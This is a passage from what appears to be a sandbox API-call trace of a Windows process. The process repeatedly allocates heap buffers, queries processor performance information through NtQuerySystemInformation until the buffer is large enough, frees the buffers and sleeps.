dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0244.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0244.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.084] Sleep (dwMilliseconds=0x110) [0244.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0244.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0244.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0244.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0244.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0244.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0244.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0244.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0244.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.095] Sleep (dwMilliseconds=0x110) [0244.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0244.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0244.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0244.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0244.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0244.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0244.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0244.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0244.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.114] Sleep (dwMilliseconds=0x110) [0244.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0244.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0244.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.128] Sleep (dwMilliseconds=0x110) [0244.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0244.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0244.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0244.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0244.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.144] Sleep (dwMilliseconds=0x110) [0244.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0244.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0244.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0244.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.157] Sleep (dwMilliseconds=0x110) [0244.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0244.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0244.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0244.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0244.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.204] Sleep (dwMilliseconds=0x110) [0244.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0244.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0244.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0244.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.220] Sleep (dwMilliseconds=0x110) [0244.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0244.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0244.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0244.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0244.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0244.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0244.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0244.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0244.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.240] Sleep (dwMilliseconds=0x110) [0244.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0244.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0244.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0244.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0244.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.253] Sleep (dwMilliseconds=0x110) [0244.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0244.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0244.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0244.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0244.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0244.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0244.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0244.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0244.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.267] Sleep (dwMilliseconds=0x110) [0244.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0244.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0244.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0244.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0244.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0244.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0244.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.283] Sleep (dwMilliseconds=0x110) [0244.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0244.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0244.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0244.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0244.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.297] Sleep (dwMilliseconds=0x110) [0244.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0244.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0244.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0244.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0244.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0244.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0244.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0244.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0244.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.313] Sleep (dwMilliseconds=0x110) [0244.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0244.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0244.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0244.331] 